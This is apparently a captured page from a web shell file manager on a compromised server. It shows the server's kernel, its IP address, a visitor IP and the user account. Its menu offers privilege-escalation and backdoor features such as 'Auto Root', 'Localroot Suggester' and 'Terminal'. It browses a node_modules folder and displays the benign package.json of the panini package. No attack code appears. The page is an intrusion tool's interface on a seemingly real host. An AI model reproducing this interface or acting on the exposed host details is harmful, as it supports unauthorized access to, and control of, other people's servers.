Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.144.199.9
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
panini /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
bin
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
helpers
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
lib
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
node_modules
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
test
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
.babelrc
26
B
-rw-rw-r--
2022-08-30 11:49
.coveralls.yml
71
B
-rw-rw-r--
2022-08-30 11:49
.travis.yml
72
B
-rw-rw-r--
2022-08-30 11:49
LICENSE
1.03
KB
-rw-rw-r--
2022-08-30 11:49
index.js
1.65
KB
-rw-rw-r--
2022-08-30 11:49
package.json
1.15
KB
-rw-rw-r--
2022-08-30 11:49
readme.md
5.29
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "panini", "version": "1.7.2", "description": "A super tiny flat file compiler.", "main": "index.js", "scripts": { "test": "mocha --require babel-core/register" }, "author": "Foundation <contact@get.foundation> (https://get.foundation)", "license": "MIT", "bin": { "panini": "./bin/panini.js" }, "dependencies": { "deepmerge": "^1.5.2", "front-matter": "^2.0.5", "glob": "^7.1.4", "handlebars": "^4.0.5", "highlight.js": "^8.9.1", "js-yaml": "^3.14.0", "marked": "^2", "nopt": "^4.0.1", "slash": "^1.0.0", "strip-bom": "2.0.0", "through2": "^2.0.5", "vinyl-fs": "^3.0.3" }, "devDependencies": { "assert-dir-equal": "^1.0.1", "babel": "^6.3.26", "babel-preset-es2015": "^6.3.13", "babel-register": "^6.4.3", "babel-runtime": "^6.3.19", "gulp": "^4.0.2", "mocha": "^8.0.1", "mocha-lcov-reporter": "^1.3.0" }, "resolutions": { "glob-parent": "^5.1.2", "yargs-parser": "^20.2.4" }, "repository": { "type": "git", "url": "https://github.com/foundation/panini" }, "bugs": { "url": "https://github.com/foundation/panini/issues" } }